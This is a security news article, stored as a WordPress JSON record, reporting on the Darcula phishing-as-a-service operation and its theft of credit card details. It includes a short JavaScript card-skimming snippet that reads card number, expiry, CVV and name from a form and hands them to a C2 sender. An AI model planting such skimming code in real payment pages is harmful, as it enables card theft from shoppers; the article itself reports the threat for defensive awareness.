{"id":3759,"date":"2025-05-06T10:03:28","date_gmt":"2025-05-06T10:03:28","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/05\/06\/darcula-phaas-stolen-884000-credit-card-details-on-13-million-clicks-from-users-worldwide\/"},"modified":"2025-05-06T10:03:28","modified_gmt":"2025-05-06T10:03:28","slug":"darcula-phaas-stolen-884000-credit-card-details-on-13-million-clicks-from-users-worldwide","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/05\/06\/darcula-phaas-stolen-884000-credit-card-details-on-13-million-clicks-from-users-worldwide\/","title":{"rendered":"Darcula (PhaaS) Stolen 884,000 Credit Card Details on 13 Million Clicks from Users Worldwide"},"content":{"rendered":"<p>    Darcula (PhaaS) Stolen 884,000 Credit Card Details on 13 Million Clicks from Users Worldwide<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>Security researchers have uncovered one of the largest credit card theft operations in recent history, with a sophisticated Phishing-as-a-Service (PhaaS) platform called \u201cDarcula\u201d responsible for stealing approximately 884,000 credit card details through a massive campaign that generated over 13 million clicks from unsuspecting users worldwide.<\/p>\n<p>The operation, which began in late 2024, has targeted consumers across 32 countries, with the highest concentration of victims in North America and Europe.<\/p>\n<p>Security experts estimate the financial damage could exceed $150 million based on current dark web values for stolen financial data.<\/p>\n<p>The Darcula platform distinguishes itself from typical phishing operations through its advanced infrastructure and subscription-based model, allowing even low-skilled cybercriminals to launch sophisticated attacks.<\/p>\n<p>The service provides customers with convincing replicas of banking websites, e-commerce platforms, and payment portals, complete with realistic SSL certificates and domain names designed to evade detection.<\/p>\n<p>Most concerning is Darcula\u2019s ability to bypass multi-factor authentication through real-time <a href=\"https:\/\/cybersecuritynews.com\/bitm-attack-lets-hackers-steal-user-sessions\/\" target=\"_blank\" rel=\"noreferrer noopener\">session hijacking<\/a> techniques that intercept and relay authentication codes.<\/p>\n<p>The massive campaign\u2019s success stems from its multi-channel approach, delivering malicious links through email, SMS, social media messaging, and compromised advertising networks.<\/p>\n<p>Victims typically receive urgent messages claiming issues with their accounts or purchases, directing them to fraudulent sites that capture their credentials and payment information.<\/p>\n<p>The operation\u2019s scale suggests a well-organized cybercriminal syndicate with significant resources and technical expertise behind it.<\/p>\n<p>Mnemonic analysts <a href=\"https:\/\/www.mnemonic.io\/resources\/blog\/exposing-darcula-a-rare-look-behind-the-scenes-of-a-global-phishing-as-a-service-operation\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">identified<\/a> the Darcula operation in February 2025 after tracing a pattern of credit card theft reported by financial institutions.<\/p>\n<p>The researchers discovered a command-and-control infrastructure spanning multiple countries, with primary servers located in Eastern Europe and Southeast Asia.<\/p>\n<p>\u201cWhat makes Darcula particularly dangerous is its modular architecture and constant evolution,\u201d explained Dr.<\/p>\n<p>Elena Vasquez, lead cybersecurity researcher at Mnemonic. \u201cThe operators continuously update their techniques to evade detection.\u201d<\/p>\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\">\n<div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"Victim data\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/aHhtHyenYKc?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div>\n<\/figure>\n<p>The most sophisticated aspect of Darcula is its advanced infection mechanism, which employs a multi-stage payload delivery system to evade <a href=\"https:\/\/cybersecuritynews.com\/best-security-solutions-for-marketers\/\" target=\"_blank\" rel=\"noreferrer noopener\">security solutions<\/a>.<\/p>\n<h2 class=\"wp-block-heading\"><strong>Initial access<\/strong><\/h2>\n<p>Initial access begins with seemingly innocuous <a href=\"https:\/\/cybersecuritynews.com\/javascript-attacks-targeting\/\" target=\"_blank\" rel=\"noreferrer noopener\">JavaScript<\/a> code embedded in fake payment pages:-<\/p>\n<pre class=\"wp-block-code\"><code>function validateInput() {\n  \/\/ Legitimate-looking form validation\n  collectCardData();\n  \/\/ Hidden function that executes the actual theft\n  setTimeout(function() {\n    let exfiltrationPayload = {\n      cardNum: document.getElementById('ccnumber').value,\n      expDate: document.getElementById('expdate').value,\n      cvv: document.getElementById('cvv').value,\n      name: document.getElementById('cardholder').value\n    };\n    sendToC2(btoa(JSON.stringify(exfiltrationPayload)));\n  }, 500);\n  return true;\n}<\/code><\/pre>\n<p>When users enter their information into these convincing forgeries, the JavaScript captures the data and encrypts it before transmission to intermediate servers.<\/p>\n<p>These servers, often compromised legitimate websites, relay the information through a series of proxies before reaching Darcula\u2019s secure storage infrastructure.<\/p>\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\">\n<div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"Phone racks\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/EZxTOksdCD8?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div>\n<\/figure>\n<p>This multi-hop architecture makes attribution extremely difficult for law enforcement.<\/p>\n<p>Financial institutions and cybersecurity companies have formed a joint task force to combat the Darcula threat.<\/p>\n<p>They recommend organizations implement advanced phishing <a href=\"https:\/\/cybersecuritynews.com\/intrusion-detection-prevention-systems\/\" target=\"_blank\" rel=\"noreferrer noopener\">detection systems<\/a> and conduct regular security awareness training for employees and customers.<\/p>\n<p>Individuals should verify website authenticity through official channels before entering sensitive information and enable transaction notifications to quickly identify unauthorized charges.<\/p>\n<p>Law enforcement agencies across multiple jurisdictions are coordinating efforts to track down the Darcula operators, though they acknowledge the sophisticated nature of the operation presents significant challenges to attribution and prosecution.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 90%,rgb(169,184,195) 100%)\"><strong><code><strong>Are you from the SOC and DFIR Teams? \u2013 Analyse Real time Malware Incidents with ANY.RUN -&gt;\u00a0<a href=\"https:\/\/app.any.run\/#register?utm_source=csn_may&amp;utm_medium=post&amp;utm_campaign=trends-q1-2025&amp;utm_content=blog&amp;utm_term=010525\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Start Now for Free<\/a>.<\/strong><\/code><\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/darcula-phaas-stolen-884000-credit-card-details\/\">Darcula (PhaaS) Stolen 884,000 Credit Card Details on 13 Million Clicks from Users Worldwide<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/darcula-phaas-stolen-884000-credit-card-details\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Darcula (PhaaS) Stolen 884,000 Credit Card Details on 13 Million Clicks from Users Worldwide Security researchers have uncovered one of the largest credit card theft operations in recent history, with a sophisticated Phishing-as-a-Service (PhaaS) platform called \u201cDarcula\u201d responsible for stealing approximately 884,000 credit card details through a massive campaign that generated over 13 million clicks [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[63,124,649],"tags":[130],"class_list":["post-3759","post","type-post","status-publish","format-standard","hentry","category-cyber-security-news","category-phishing","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/3759"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=3759"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/3759\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=3759"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=3759"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=3759"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}